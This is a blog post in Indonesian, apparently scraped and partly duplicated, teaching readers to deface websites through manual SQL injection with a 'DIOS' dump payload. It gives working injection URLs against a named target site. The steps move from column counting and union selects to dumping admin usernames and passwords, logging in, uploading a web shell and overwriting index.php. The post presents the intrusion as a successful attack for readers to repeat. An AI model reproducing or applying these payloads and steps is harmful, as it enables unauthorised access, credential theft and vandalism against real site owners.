Hello Sedulur Sekalian kali ini w mau share tentang Metode Deface Sql Injection Manual Dengan DIOS ( Dump In One Shoot ). berdasarkan w ini menarik buat kalian pelajari. alasannya salah satu bug ini banyak di dapatkan di situs indonesia & india.
Sumber https://mrwho-404.blogspot.com/
Baca Juga
- Download Kinemaster Premiere Pro Apk MOD
- Cara Mengubah SD Card Menjadi Memori External
- Cara Decrypt Password Wordpress
- Exploit RCE Pada Samba ( Remote Code Execution )
Untuk Script Dios Nya Bisa KLIK DISINI.
Sekarang, kita pribadi saja ketutorialnya.
Disini gw udah dapet target, kalo kalian belom punya dork buat dapet website vuln sqli kalian sanggup baca dibawah ini.
Ini teladan sasaran gw,
Lanjut kita bermain dengan order+by+1-- dan seterusnya hingga menemukan pesan error.
Disini w mendapat errornya di angka order+by+10-- berarti jumlah columnnya ada 9.
Ditarget gw ga ada error mysql blablabla atau error sqli yang lainnya, tapi disini errornya datanya hilang atau artikelnya kosong di bab bawah about.(lihat gambar diatas)
Oke lanjut ketutorial berikutnya, masukan union select.
Selengkapnya menyerupai ini,
Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka magicknya atau biasa menyebutnya dengan angka ajaib
Kalo ditutorial kemarin kita harus memasukan group_concat dll kali ini enggak, tinggal kita masukan code DIOS nya saja.
Disini w milih angka 9 aja dan berikut ini code DIOS nya,
Untuk perintah lengkapnya kek gini gaes,
Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.
Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini sasaran gw nama column admin nya adalah admin dan untuk nama tablenya adalah USER_NAME dan PASSWORD bisa lihat digambar bawah ini,
Berarti kita perintahnya untuk memasukan ke code dios nya jadi gini,
Dan bummmm lihat(gambar diatas), Ternyata kita berhasil ngedump username dan passwordnya.
Setelah itu tinggal cari daerah admin loginya, tapi disini gw udah tau daerah admin loginya jadi tinggal login.
Sekarang cari daerah buat upload shell, lihat gambar dibawah ini,
Setelah menemukan daerah buat upload shell, kini saatnya upload shell kalian.
Kalo belum punya shell kalian sanggup cari dipostingan gw ada kok.
Dan disini gw udah berhasil uploadnya, liat gambar dibawah ini,
Untuk cara mengaksesnya shellnya kalian tinggal klik kanan kemudian copy url dibrowser,
Untuk diandroid tinggal klik dan tahan pada shell kalian yang udah diupload tadi kemudian salin url gambar,
Sekarang tinggal paste url shell tadi dibrowser dan enter, nanti shell kalian bakalan muncul.
Nah step terakhir, cari directory publick_html dan upload script deface kalian disitu dengan extensi index.php ini untuk ngedeface halaman utama website.
Kalo hanya mau nitip file saja, kalian upload script deface selain index.php bisa dengan nama test.php, test.html, dll sesuai harapan kalian aja.
Oke sekian dulu artikel kali ini, biar bermanfaat.
www.situs.co.il/advertiser_view.php?id=77
Lanjut kita bermain dengan order+by+1-- dan seterusnya hingga menemukan pesan error.
Disini w mendapat errornya di angka order+by+10-- berarti jumlah columnnya ada 9.
Ditarget gw ga ada error mysql blablabla atau error sqli yang lainnya, tapi disini errornya datanya hilang atau artikelnya kosong di bab bawah about.(lihat gambar diatas)
Oke lanjut ketutorial berikutnya, masukan union select.
Selengkapnya menyerupai ini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,9--
Dan mari kita lihat(gambar di atas), dibagian bawah about keluar angka magicknya atau biasa menyebutnya dengan angka ajaib
Kalo ditutorial kemarin kita harus memasukan group_concat dll kali ini enggak, tinggal kita masukan code DIOS nya saja.
Disini w milih angka 9 aja dan berikut ini code DIOS nya,
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Untuk perintah lengkapnya kek gini gaes,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)--
Nah lihat itu(gambar diatas), semua column dan beserta table sudah muncul.
Yang kiri itu column kalo yang kanan itu tablenya. Tinggal kita dump deh gaes hehe.
Lanjut ke tutorial ngedumpnya ,cari nama admin atau apa yang sekiranya berbau admin.
Disini sasaran gw nama column admin nya adalah admin dan untuk nama tablenya adalah USER_NAME dan PASSWORD bisa lihat digambar bawah ini,
Berarti kita perintahnya untuk memasukan ke code dios nya jadi gini,
www.situs.co.il/advertiser_view.php?id=-77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--
Dan bummmm lihat(gambar diatas), Ternyata kita berhasil ngedump username dan passwordnya.
Setelah itu tinggal cari daerah admin loginya, tapi disini gw udah tau daerah admin loginya jadi tinggal login.
Sekarang cari daerah buat upload shell, lihat gambar dibawah ini,
Setelah menemukan daerah buat upload shell, kini saatnya upload shell kalian.
Kalo belum punya shell kalian sanggup cari dipostingan gw ada kok.
Dan disini gw udah berhasil uploadnya, liat gambar dibawah ini,
Untuk cara mengaksesnya shellnya kalian tinggal klik kanan kemudian copy url dibrowser,
Untuk diandroid tinggal klik dan tahan pada shell kalian yang udah diupload tadi kemudian salin url gambar,
Sekarang tinggal paste url shell tadi dibrowser dan enter, nanti shell kalian bakalan muncul.
Nah step terakhir, cari directory publick_html dan upload script deface kalian disitu dengan extensi index.php ini untuk ngedeface halaman utama website.
Kalo hanya mau nitip file saja, kalian upload script deface selain index.php bisa dengan nama test.php, test.html, dll sesuai harapan kalian aja.
Oke sekian dulu artikel kali ini, biar bermanfaat.